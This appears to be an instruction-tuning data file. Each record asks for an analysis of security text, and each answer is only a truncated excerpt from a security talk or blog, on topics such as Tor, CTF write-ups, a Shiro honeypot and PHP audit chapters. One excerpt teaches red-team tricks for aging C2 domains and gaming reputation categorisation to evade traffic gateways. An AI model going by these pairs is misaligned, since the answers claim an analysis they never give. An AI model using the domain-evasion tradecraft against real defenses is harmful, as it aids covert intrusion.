{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTracking Motorola Systems http://www.signalharbor.com/ttt/00mar/index.html 1 of 5 6/18/2007 14:07 This article first appeared in the March 2000 issue of Monitoring Times. TRACKING MOTOROLA SYSTEMS The most common trunked radio systems in use by public safety agencies in the United States are those manufactured by Motorola. This month we'll briefly review the different systems and go into more detail with each one in the coming months. Broadly speaking, there are four main types of Motorola systems. They are Type I, Type II, Type I/II hybrids, and ASTRO. With the exception of ASTRO, voice transmissions in these systems are analog, meaning you can hear them on a regular scanner. Motorola Type I Type I is a first generation trunking system that operates only in the 800 MHz range. You may also run across the phrase \"Privacy Plus,\" which started out in life as a Motorola marketing term for a Type I system. Type I systems are somewhat more confusing to a beginning listener because of the way talk groups are assigned. As you may recall from previous columns, conventional (non-trunked) two-way radio creates talk groups by assigning a different radio frequency to each group of users. In trunked radio systems, a small set of radio frequencies is shared among a number of groups, with each group having their own \"talk group\" identifier. In a public safety system, for example, a city may have the police department in one talk group, the fire department in another talk group, and the streets and sanitation department in a third talk group. These talk groups are distinguished by digital codes that the radios transmit and receive. Fleets and Subfleets Type I systems are organized into a hierarchy of fleets, subfleets, and users. Each fleet is made up of several subfleets, and each subfleet in turn is made up of individual radio identifiers. A fleet is usually a group of subfleets that all work for the same organization, like a police or fire department. Each of those subfleets is m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBugscan 发展历程 01 圈子成员 02 框架改进 03 发展历程 2015.2 正式发布 2011 诞生 历时四年五次重构 2015.5 圈子发布 2015.8 Bugscan 沙龙 圈子人数增加到5000多人插件由90个增加到600多 目前可针对20多种系统服务进行识别弱口令破解 可识别扫描80多种主流web程序网络设备的漏洞 目前已扫描超过100万的目标600万余条漏洞记录 圈子成员 圈子社区 圈子成员 圈子社区核心成员 各种通用型插件数量最多质量最高 快速跟踪热点漏洞 发现Xx狗拒绝服务漏洞 各种系统服务协议漏洞 插件审核圈子商城 插件审核插件编写教程 Zero 星光点亮天 range Medici.Yan 不流畅 LinE 框架改进-curl的改进 Curl的改进 框架改进-过滤插件 过滤插件的改进 爬虫插件 curl 目标 新目标 过滤型插件 主动插件 curl 目标 过滤型插 件 1.比如检测注入插件中报错了过滤型插件就能抓取到 2.比如其他插件在调用curl的时候过滤型插件发现新的表单 框架改进-日志 日志的改进 服务器与节点通信 爬虫的网址的tree 插件的选派(assign) 插件的验证(audit) 插件调用curl 插件调用debug task的分发 框架插件异常日志 通信 Task分发 选派assign 验证audit Curl的调用 Debug日志 框架改进-日志 日志的改进 服务器与节点通信 爬虫的网址的tree 插件的选派(assign) 插件的验证(audit) 插件调用curl 插件调用debug task的分发 框架插件异常日志 快速定位误报漏报问题 定位复杂的综合性bug 发现耗时的插件加以改进 框架改进-任务分发时的优先级 爬虫插件会推送大量www的task 需要将task普通队列变成优先级队列 将cms识别cms类插件系统插件等重要的插件级别设高 THANKS FOR YOUR WATCHING", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 The Tor Project Our mission is to be the global resource for technology, advocacy, research and education in the ongoing pursuit of freedom of speech, privacy rights online, and censorship circumvention. 2  Online Anonymity  Open Source  Open Network  Community of researchers, developers, users and relay operators.  U.S. 501(c)(3) non- pro%t organization 3 Estimated 2,000,000 to 8,000,000 daily Tor users 4 Threat model: what can the attacker do? Alice Anonymity network Bob watch (or be!) Bob! watch Alice! Control part of the network! 5 Anonymity isn't encryption: Encryption just protects contents. Alice Bob Hi, Bob! Hi, Bob! <gibberish> attacker 6 7 Anonymity serves different interests for different user groups. Anonymity It's privacy! Private citizens 8 Anonymity serves different interests for different user groups. Anonymity Private citizens Businesses It's network security! It's privacy! 9 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's traffic-analysis resistance! It's network security! It's privacy! 10 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's traffic-analysis resistance! It's network security! It's privacy! Human rights activists It's reachability! 11 12 13 14 15 16 Tor's safety comes from diversity  #1: Diversity of relays. The more relays we have and the more diverse they are, the fewer attackers are in a position to do traffic confirmation. (Research problem: measuring diversity over time)  #2: Diversity of users and reasons to use it. 50000 users in Iran means almost all of them are normal citizens. 17 Transparency for Tor is key  Open source / free software  Public design documents and specifications  Publicly identified developers  Not a contradiction: privacy is about choice! 18 Tor censorship epochs  Background / Phase 1 (2006-2011): Bridges, pluggable transports  Phase 2 (2011-2019): Active probing, obfs", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n{ domas / @xoreaxeaxeax / DEF CON 2018 The ring 0 facade: awakening the processor's inner demons  Christopher Domas  Cyber Security Researcher ./bio disclaimer: The research presented herein was conducted and completed as an independent consultant. None of the research presented herein was conducted under the auspices of my current employer. The views, information and opinions expressed in this presentation and its associated research paper are mine only and do not reflect the views, information or opinions of my current employer.  General-purpose-registers  Special-purpose-registers  FPU, MMX, XMM, YMM, ZMM  Control registers  Model-specific-registers Processor registers  Debugging  Execution tracing  Performance monitoring  Clocking  Thermal controls  Cache behavior Model-specific-registers  Accessing MSRs:  Ring 0  Accessed by address, not name  0x00000000  0xFFFFFFFF  Only a small fraction are implemented  10s  few 100s  64 bits  Read with rdmsr  Read to edx:eax  Written with wrmsr  Written from edx:eax Model-specific-registers movl $0x1a0, %%ecx /* load msr address */ rdmsr /* read msr 0x1a0 */ /* configure new values for msr */ orl $1, %%eax orl $4, %%edx wrmsr /* write msr 0x1a0 */ Model-specific-registers  Undocumented debug features  Unlock disabled cores  Hardware backdoors Secrets  Additionally, accessing some of the internal control registers can enable the user to bypass security mechanisms, e.g., allowing ring 0 access at ring 3. In addition, these control registers may reveal information that the processor designers wish to keep proprietary. For these reasons, the various x86 processor manufacturers have not publicly documented any description of the address or function of some control MSRs .  - US 8341419 Secrets  Nevertheless, the existence and location of the undocumented control MSRs are easily found by programmers, who typically then publish their findings for all to use. Furthermore, a processor manufacturer may need to disclose the addresses an", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPHP 代码审计 培训教材 路虽远行则必达 - 2 - 目录 代码审计基础........................................................................... - 4 - 代码审计概念.................................................................................- 4 - 需要了解一些函数.........................................................................- 6 - 需要了解的超全局变量.................................................................- 7 - 审计之初.......................................................................................- 11 - 如何进行漏洞挖掘.......................................................................- 13 - 一些代码审计工具介绍...............................................................- 16 - 重装漏洞................................................................................. - 20 - 开源轻论坛 StartBBS 前台 getshell............................................ - 20 - Simple-Log 博客系统全版本重安装漏洞................................... - 25 - SQL 注入漏洞..........................................................................- 30 - WiiNews(Mobile 新闻系统).........................................................- 31 - tpshop 注入.................................................................................. - 34 - 74CMS 人才系统注入全版本通杀进后台....................................- 37 - iSiteCMS 几处注射漏洞...................................................................- 43 - PHPYun XML 实体注入................................................................ - 48 - cmseasy 无限制报错注入...........................................................- 63 - 文件包含................................................................................. - 67 - phpcms2008 本地文件包括及利用.............................................- 69 - simple-log 后台任意文件读写漏洞............................................ - 70 - 易酷 cms 本地包含导致 getwebshell.........................................- 72 - 远程命令执行......................................................................... - 81 - 惠尔顿上网行为管理系统命令执行...........................................- 81 - 上海格尔安全认证网关管理系统命令执行......................... - 85 - 文件上传漏洞.......", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SCS CTF 2018 Team: msm, rev, nazywam, rodbert, sasza, chivay, des, eternal, psrok1 ### Table of contents * [binary (re)](re_binary) * [xors (crypto)](crypto_xor) * [rots (crypto)](crypto_rot) * [serialize (web)](web_serialize) ### Notes: Actually there was a 3-person limit for a team, so we started as three separate teams: - p4-indigo: msm, rev, nazywam - p4-lime: rodbert, sasza, chivay - p4-orange: des, eternal, psrok1 Also I don't remember the original task names, so I had to invent my own.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 1/9 depy It is a long and beautiful life. 首页 关于 友链 开发shiro蜜罐遇到的一些问题 2022年09月14日 / 网络安全 前情概要 我曾经写过一篇文章是帮助freebuf实现php网站拥有shiro的:https://rce.ink/i ndex/view/366.go 之前的蜜罐一直写到可以根据指定key让工具实现逼真的爆破效果,如图所示  2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 2/9 这样攻击者会觉得网站是shiro框架并且被我爆破出了一个key再配合修改p hpsessionid为jsessionid脚本伪静态修改后缀为jsp达到更好的效果 后续开发 上次写到那里我就去做更有意思的项目了直到最近我才开始对指定利用链检 测命令回显等功能进行完善  2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 3/9 我写了一堆php代码来配合脚本小子使用工具进行利用链测试的场景大概可以 实现下面的效果 脚本小子发现可以使用这个cc链进行攻击的时候肯定会进行命令执行那么我 也只需要写脚本来配合他的一些场景给响应的回显即可在这里具体针对一下j1a nfen师傅开发的shiro-attack工具我们反编译工具中的AttackService.clas s代码如下 通过设置序列化的恶意attackRememberMe到cookie对用户输入命令进行b ase64编码放入请求头取响应包body中的内容进行字符串$$$分割,然后取第二 组数据也就是响应结果在进行base64解码拿到命令回显 写一个配合实现的脚本但是执行命令的时候抛出下标越界的错误也就是响应 包不是类似$$$data$$$的字符串  2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 4/9 工具可以设置代理我挂了一个burpsuite代理 结果响应是正常的  2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 5/9 没办法 只能对jar包打断点 dt_socket,address=5005,server=y,suspend=y -jar /Users/depy/deskto  2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 6/9 在 String responseText = this.bodyHttpRequest(header, \"\"); 处打一个断 点 然后发送命令执行的指令 在代理请求下正常 在关闭代理的情况下 数据变成的乱码 让我非常疑惑 使用自己写的工具浏览器 访问都正常 就工具不正常 一开始实在没想明白 一直觉得是工具有问题 但是转过头想那为啥其他有漏洞的 网站可以测试呢所以显然是自己的网站有问题 我不断观察响应包 发现一个header 捏吗 这不是gzip压缩的标头么 看了下数据貌似是被压缩了 这我才想到 我特么网 站用的是nginx啊  2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 7/9 很好 果然是开了 把on改成off 标头就消失了 然后就可以正常执行命令了  2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 8/9 这样我们可以愉快的构造一些虚假的命令执行结果 继续浪费他的时间 对着php一 顿shiro反序列化了 原因 1.burpsuite等支持自动对响应做gzip解压缩  2022/9/14 上午1:41 开发shiro蜜罐遇到的些问题 - depy https://rce.ink/index/view/406.go 9/9 2.工具使用的请求类URLConnection不支持自动做gzip解压或者版本太低我 使用自己java工具测试的时候是正常的看了下我用的是httpurlconnection 所以使用j1anfen师傅工具的时候 建议直接挂burpsuite代", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SECCON 2019 Quals Team: rev, nazywam, Eternal, kazet, rodbert, c7, msm, chivay, shalom ### Table of contents * [ZKPay (crypto?/web)](zk_pay) * [Fileserver (web)](fileserver) * [Pngbomb (misc)](pngbomb) * [Multiplicater (web)](multiplicater) * [Crazy repetition of codes (crypto)](crc) ![](scoreboard.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Advanced Hardware Hacking Techniques Joe Grand (Kingpin) joe@grandideastudio.com DEFCON 12 Friday, July 30 2  2004 Grand Idea Studio, Inc. Agenda The \"What\" and \"Why\" of Hardware Hacking Enclosure & Mechanical Attacks Electrical Attacks Final Thoughts and Conclusions 3  2004 Grand Idea Studio, Inc. What is Hardware Hacking (to me)? Doing something with a piece of hardware that has never been done before  Personalization and customization (e.g., \"hot rodding for geeks\")  Adding functionality  Capacity or performance increase  Defeating protection and security mechanisms (not for profit) Creating something extraordinary Harming nobody in the process 2 4  2004 Grand Idea Studio, Inc. Why Hardware Hacking? Curiosity  To see how things work Improvement and Innovation  Make products better/cooler  Some products are sold to you intentionally limited or \"crippled\" Consumer Protection  I don't trust glossy marketing brochures...do you? 5  2004 Grand Idea Studio, Inc. Hardware Security Myths Many security-related products rely on misconceptions to remain \"secure\" Hardware hacking is hard Consumers lack the competency or courage to void their warranty Therefore, hardware is \"safe\" 6  2004 Grand Idea Studio, Inc. Gaining Access to a Product Purchase  Buy the product from a retail outlet (with cash) Evaluation  Rent or borrow the product Active  Product is in active operation, not owned by attacker Remote Access  No physical access to product, attacks launched remotely 3 7  2004 Grand Idea Studio, Inc. Attack Vectors Interception (or Eavesdropping)  Gain access to protected information without opening the product Interruption (or Fault Generation)  Preventing the product from functioning normally Modification  Tampering with the product, typically invasive Fabrication  Creating counterfeit assets of a product 8  2004 Grand Idea Studio, Inc. Enclosure & Mechanical Attacks Opening Housings External Interfaces Anti-Tamper Mechanisms Conformal Coating and Epoxy Encapsulation Remov", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n做红队你需要学习如何挖掘战壕二 0x00 前言 在这个系列的上一篇文章中我们主要讲了什么是红队基础设施以及红队基础设施的架构与设计思路 最后我们分析了构成红队基础设施的几个元素ip和域名C2工具前置器今天我们主要分析的是IP 和域名也就是如何选择域名和IP在攻防对抗中域名和IP是非常重要的元素在防御上基于域名和IP 数据来追踪攻击是非常重要的手段因此作为公鸡队一定要选好域名和IP这样会事半功倍 0x01 域名的选择 抢注过期域名 这个方法公鸡队小伙伴应该都知道主要利用的是https://www.expireddomains.net/expired-domain s/ 的数据这个网站实时更新着快要过期的域名列表虽然如此但是目前你很难抢到好域名了因为 这个方法太出名全世界的公鸡队都在抢就是八仙过海各显神通了 虽然这个方法现在不太好用了我还是写出来的原因是我们要明白背后的原理我们为什么要抢注过 期域名这是和防御手段对抗密切相关的很多流量网关设备对出网的域名有限制这些防御设备会根 据域名的一些维度来综合判断允不允许出网例如注册时间被访问量网站类型是否是httpsssl 证书是否合法等等因此过期域名成了一个香饽饽 expireddomains这个网站我一度认为是为公鸡队量身打造的因为他基本列出了公鸡队关注的域名的各 种属性例如年龄反链数第一个网站快照日期快照数还有alexa排名详细的如图 当然了有人的世界天然存在阶级上面是穷人方案靠手艺抢注富人可以靠钱解决这2个付费的网 站给钱你就能搞到好的域名https://www.freshdrop.com/ https://www.domcop.com/ 我没测试 过我穷 自己养域名 言归正传域名的选择大部分思考是围绕的怎么突破流量网关设备的拦截我们搞不到过期域名我们 可以做时间的朋友自己养啊自己养就涉及到注册域名这有几个tips也是我血淋淋的教训 注册域名不要包含世界大厂和杀毒厂商关键字比如McAfeeGoogle等等 谨慎注册和目标相似的域名比如g00gle和Mc4fee 注册目标相关地区常见软件相似的域名比如xunleidown 注册域名的时候不要忘记开隐私保护 有些网上文章让你注册和目标相似域名或者大厂相似域名你要区分好钓鱼域名和c2域名的区别钓鱼 域名迷惑的是人c2域名过的是网关设备设备都是规则你搞这种相似域名就是对牛弹琴它看不 懂反而直接被告警但是呢你可以注册些包含目标相关地区当地比较有名的企业域名这样工具规 则肯定是不可能识别为恶意同时如果人工介入分析也会被迷惑最后隐私保护一定要开 域名信誉系统 上面说到我们搞这么多都是为了过流量网关出网这就涉及到流量网关的一些防控机制对于流量网关 来说它怎么来判断一个域名的好坏呢白名单这样员工估计要造反了极度影响工作效率真实情况 是这些防控设备厂商维护了一套域名信誉系统就是给一个域名分类评信誉等级如下图所示是 麦咖啡的域名信誉系统 比如这个域名就被分类到了business类信誉等级是Minimal Risk网关设备就是根据这些来判断一 个域名允不允许访问的那么问题来了我们怎么让这些厂商给我们注册的域名分好类呢上图中也 有就是你提交自己的域名点击Check URL当然在来提交前你的域名肯定要解析到一个网站这 有几个tips 建的网站最好是金融医疗电商航空等类别因为国外隐私罚款很重涉及到大量用户信息 的网站流量网关不敢搞流量解密不然罚款到破产那么问题来了我怎么建这些类的网站呢用 关键字改改title可以研究下SEO手法还有一个方法是反向代理到不是太出名的这些类网站 切记不要反代到世界知名网站后面我会讲一个血淋淋的故事 根据经验使用知名CMS建站效果比较好 一般1-2周就能被分类各个厂商情况不同 常见的域名信誉评级网站 www.talosintelligence.com exchange.xforce.ibmcloud.com fortiguard.com sitereview.bluecoat.com cymon.io global.sitesafety.trendmicro.com domain.opendns.com tools.zvelo.com www.watchguard.com www.trustedsource.org 因为信誉评级厂商较多手动肯定是不行了于是要工具不清楚现在这些项目还能用不我自己写 的一个工具肯定是不能用了就不发了 github.com/mdsecactivebreach/Chameleon github.com/threatexpress/domainhunter github.com/GhostManager/DomainCheck github.com/Mr-Un1k0d3r/CatMyPhish 养域名的其他经验", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlockchain Security: From Curves to Contracts Dr. Jimmy Chen, IKV & NTU Alex Liu, AMIS & MaiCoin HITCON Pacific 2016 Aspects of Security  ECDSA for Transaction Signing (including hardware signing)  Hash Function Collision Resistance  Privacy Preserving Features (Zero-Knowledge Proofs)  Consensus Algorithms  Smart Contract Correctness 2 Introduction to Blockchain 3 Source: http://technews.tw/2016/04/10/blockchain-applied-on-wall-street 4 Source: http://finance.technews.tw/2016/04/12/blockchain-bank-fintech 5 Source: https://kknews.cc/tech/m4kmbp.html 6 7 http://coinmarketcap.com Elliptic Curve 橢圓曲線  The rich and deep theory of Elliptic Curves has been studied by mathematicians over 150 years  Elliptic Curve over R : y2 = x3 + ax + b Point Addition Image Courtesy: http://www.embedded.com/design/safety-and-security/4396040/An-Introduction-to-Elliptic-Curve-Cryptography Point Doubling 8 Curves over Prime Fields 質數體上的曲線 9 Addition: (x3, y3) = (x1, y1) + (x2, y2) Doubling: (x3, y3) = [2] (x1, y1) 2 1 2 1 2 1 1 2 3 1 2 3 1 3 1 mod 3 mod 2 mod ( ) mod y y p x x s x a p y x s x x p y s x x y p                 (addition) (doubling) 9 G(5,6) 2G 3G 4G 5G 6G 7G 8G 9G 10G 11G 12G 13G 14G 15G 16G 17G 18G 19G 20G 21G 22G 23G 24G 25G 27G 26G 30G 28G 29G The Curve used by Bitcoin and Ethereum 橢圓曲線 secp256k1 https://en.bitcoin.it/wiki/Secp256k1 256-bit prime 256-bit prime 10 Key Pairs 金鑰對  The base point G is fixed on the given Elliptic Curve  P = [m] G  Given m, it is easy and fast to find the point P  Using double and add for scalar multiplication  Given P, it is extremely hard to find the integer m  Elliptic Curve Discrete Logarithm Problem (橢圓曲線離散對數問題)  A randomly generated integer m is a private key  A private key is used to sign Bitcoin transactions with ECDSA  The point P is the public key corresponding to m  A public key is used by other nodes to verify Bitcoin transactions  A Bitcoin address is the hash value of a public key P 11 Bitcoin Transactions 交易 12 Must be protected v", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# tracer Forensics, Easy ## Description > Tracing the Kuchenblech-Mafia is hard! A text file was attached. ## Solution Let's check the attached file: ```console root@kali:/media/sf_CTFs/36c3/tracer# cat chal2-98f6917950f95448890949f2d9b9850a.txt | head 264 execve(\"/bin/bash\", [\"/bin/bash\"], 0x7ffdebc8fb30 /* 8 vars */) = 0 264 read(3, \"\\177ELF\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0>\\0\\1\\0\\0\\0\\220\\311\\0\\0\\0\\0\\0\\0\"..., 832) = 832 264 read(3, \"\\177ELF\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0>\\0\\1\\0\\0\\0P\\16\\0\\0\\0\\0\\0\\0\"..., 832) = 832 264 read(3, \"\\177ELF\\2\\1\\1\\3\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0>\\0\\1\\0\\0\\0\\260\\34\\2\\0\\0\\0\\0\\0\"..., 832) = 832 264 read(3, \"# /etc/nsswitch.conf\\n#\\n# Example\"..., 4096) = 497 264 read(3, \"\", 4096) = 0 264 read(3, \"\\177ELF\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0>\\0\\1\\0\\0\\0\\240\\22\\0\\0\\0\\0\\0\\0\"..., 832) = 832 264 read(3, \"\\177ELF\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0>\\0\\1\\0\\0\\0p \\0\\0\\0\\0\\0\\0\"..., 832) = 832 264 read(3, \"\\177ELF\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0>\\0\\1\\0\\0\\0\\220@\\0\\0\\0\\0\\0\\0\"..., 832) = 832 264 read(3, \"\\177ELF\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0>\\0\\1\\0\\0\\0P#\\0\\0\\0\\0\\0\\0\"..., 832) = 832 root@kali:/media/sf_CTFs/36c3/tracer# cat chal2-98f6917950f95448890949f2d9b9850a.txt | tail 541 write(1, \"\\33[?2004l\\33[?1l\\33>\", 15) = 15 541 write(1, \"\\33[?25h\\33[?1049l\\33[23;0;0t\", 23) = 23 541 +++ exited with 0 +++ 264 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=541, si_uid=0, si_status=0, si_utime=14, si_stime=5} --- 264 write(2, \"\\33]0;root@c28a269da35a: /\\7root@c2\"..., 46) = 46 264 read(0, \"\\4\", 1) = 1 264 write(2, \"exit\\n\", 5) = 5 264 write(3, \"apt install vim\\nvim Flag\\n\", 25) = 25 264 read(3, \"apt install vim\\nvim Flag\\n\", 25) = 25 264 +++ exited with 0 +++ ``` It looks like the output of `strace`, mainly describing the process of installing `vim` via `apt install` and using it to open a file named `Flag`. The trace itself is 66047 lines long, but up to line ~65600 the output is only related to the installation itself. On line 65624 we have: ``` 541 execve(\"/usr/bin/vim\", [\"vim\", \"Flag\"], 0x5592", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRun ChatGLM-6B Finetune your ChatGLM from scratch! Run ChatGLM-6B 2023/05/21 1 TOC GLM Fintune Prerequisite: Mixed Precision, ZeRO P-tuning Full Parameter LoRA Deploy with Gradio Run ChatGLM-6B 2 GLM: Pretraining Run ChatGLM-6B 3 OpenSource GLM Series GLM Github Paper GLM-130B Github Paper ChatGLM-6B Github Blog can be finetuned on consumer-grade GPUs Run ChatGLM-6B 4 Demo Download ChatGLM-6B checkpoints Inference with ChatGLM-6B Finetuning P-Tuning (1 RTX3090 !) LoRA (1 RTX3090 !) Full Parameter Run ChatGLM-6B 5 Demo environemnt GPU: NVIDIA GeForce RTX 3090 This is not a must. 7GB is sufficient for P-tuning + 4-bit quantization Image: nvidia-pytorch:22.08-py3 Change your pip source pip config set global.extra-index-url https://pypi.tuna.tsinghua.edu.cn/simple # Writing to /opt/conda/pip.conf pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple # Writing to /opt/conda/pip.conf pip config set global.trusted-host https://pypi.tuna.tsinghua.edu.cn/simple # Writing to /opt/conda/pip.conf Run ChatGLM-6B 6 Download Checkpoint Option1: From HuggingFace Repo Step 1: Install git-lfs , Get Started Verify installation git lfs install # > Git LFS initialized. Step 2: Setup a ... Run ChatGLM-6B 7 Step 3: clone the repo git clone https://huggingface.co/THUDM/chatglm-6b # Cloning into 'chatglm-6b'... # remote: Enumerating objects: 522, done. # remote: Counting objects: 100% (522/522), done. # remote: Compressing objects: 100% (495/495), done. # remote: Total 522 (delta 321), reused 54 (delta 27), pack-reused 0 # Receiving objects: 100% (522/522), 158.52 KiB | 823.00 KiB/s, done. # Resolving deltas: 100% (321/321), done. Seems to stuck here is expected behaviour It's downloading the checkpoint ... Use bwm-ng to monitor network traffic Run ChatGLM-6B 8 Option 2: Downloading Manually Useful when downloading from huggingface repo is slow Step 1: clone the repo, skip large files GIT_LFS_SKIP_SMUDGE=1 git clone https://huggingface.co/THUDM/chatglm-6b # Cloning into '", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAssembly Language Is Too High Level ...or the drinking game replaces 'cyber' with 'assembly is too high level' DEF CON 25 XlogicX Shoutz  KRT_c0c4!n3 (art)  Fat Cat Fab Lab (where I hack)  NYC2600 (who I friend)  DC201 (Because DEF CON) - My girlfriend KRT_c0c4!n3 (art director) did a good portion of the art of these slides - I worked on most of my code and all of these slides from Fat Cat Fab Lab. It's my favorite hackerspace in the NYC area (West Village) - NYC2600 is my local 2600 community and where I've made most of the friends I have in NYC -DC201, because it's the closest active DEF CON group in my area Even as a kid I wanted to do low level programming. I had no access or knowledge of compilers or even major programming languages. I deep down felt like I should be able to type the right binary data into a notepad (or something like it) and run it, but all I had was just some Windows 3.11 and ignorance I eventually did end up typing hex into debug (comes with Windows 3.11+) and executed my program live at CactusCon 2016 Deck at http://xlogicx.net/?p=515 I eventually try to teach myself Z80 assembly. This is because I already had a TI-82 and already tried some sweet games programmed in assembly. The first program I made was an example program that clears the screen. My first attempt to make my own program cleared the memory. This was unintended... I then formally learn Assembly for the M68HC11 microcontroller in school. I don't even remember if we had a textbook, but we did have the Motorola manual. This manual listed all of the instructions with the machine code next to the instruction. I had a lot of fun with this architecture. Inspired by Godel Escher Bach, I attempted to create a program that replicated itself into the next area of memory and executed itself. I learned the importance of needing to understand the abstraction layer of machine code in order to pull this off. Also, the assembly language and machine code for this architecture was relatively one", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Science of Social Engineering Mike Murray / Anton Chuvakin mmurray@episteme.ca anton@chuvakin.org NLP, Hypnosis and The Science of Persuasion Outline  The Basics  Social Engineering and Persuasion  The Language of Influence  Framing - Context over Content  Hypnosis  The art of communication  Putting it all together The Language of Influence  Language is the prime mode of influence  What is the differentiates skillful use of language?  Language is the programming language of the mind  The Main Functions of Language (and the mind)  Deletion  Distortion  Generalization  The Meta Model and The Milton Model  Precision and Artful Vagueness Framing  Context Is More Important than Content  Human Nonlinearity  The Cognitive Frame  How do I establish a context for influence?  Cialdini - The Master of the Frame  Moving and Controlling Frames  What Color is Your Parachute? The Language of Influence  Language is the prime mode of influence  What is the differentiates skillful use of language?  Language is the programming language of the mind  The Main Functions of Language (and the mind)  Deletion  Distortion  Generalization  The Meta Model and The Milton Model  Precision and Artful Vagueness Hypnosis  Hypnosis is not what you think it is.  Dave Elman: \"a state of mind in which the critical faculty of the human mind is bypassed, and selective thinking established.\"  Traditional Hypnosis  Structured attention  Miltons (and Grimms) Art  Use (apparently) unstructured attention  Patterning and framing through metaphor  The Mental Buffer Overflow Back to Social Engineering  Bringing it back to the real  Structured Examples of Reality  Social Engineering is All About Framing  Back to Cialdini - pick your frame  Use language artfully within the engagement  Putting it all together Thanks Mike Murray / Anton Chuvakin mmurray@episteme.ca anton@chuvakin.org", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Agricultural Data Arms Race: Exploiting a Tractor Load of Vulnerabilities In The Global Food Supply Chain. (in good faith) A man, Using a hand tractor for cultivation. Falls City Farmsteads, Nebraska Rothstein, Arthur, 1915- 1985, photographer (Public Domain) John Deere 7450 ProDrive Forage Harvester Disclaimer  None of research was paid for  All research was done in good faith  Nothing today represents our employers, past employers, or future employers  None of us are under gag orders*  All content in the slides is CC0  All trademarks, logos and brand names are the property of their respective owners. Who am I? Sick Codes - good hackerman https://github.com/sickcodes https://twitter.com/sickcodes https://linkedin.com/in/sickcodes https://sick.codes Why is this important? Scnenarios  The sprayers are programmed by the hacker to unevenly spray the chemicals on the crops, applying ten times the chemical on certain parts of the field, and a tenth the dose on other parts. Skewed risks  Denial of Service BIG impact  hacker uploads a firmware update that inserts an offset into the GPS locations used by the target. Real threats  offset of (say) 100 yards North of where it should be. The target navigates itself onto a highway, into a river, through a fence, over a cliff, or whatever. Target is destroyed, Conor Cagney: https://sick.codes/leaky-john-deere-apis-serious-food-supply- chain-vulnerabilities-discovered-by-sick-codes-kevin-kenney- willie-cade/#comment-41658 More Real threats  The sprayers are programmed by the hacker to unevenly spray the chemicals on the crops, applying ten times the chemical on certain parts of the field, and a tenth the dose on other parts. Why did we even look at Ag? Nobody else was. Willie Cade Grandson of Theo Brown who was spent 30 years on John Deere Board. Kevin Kenney  Nebraska  Engineer  Farmer  Photographer: Walker Pickering for Bloomberg Businessweek The hackers  Sick Codes https://twitter.com/sickcodes  wabaf3t https://twitter.com/", "category": "text_analysis", "source": "security_papers"}
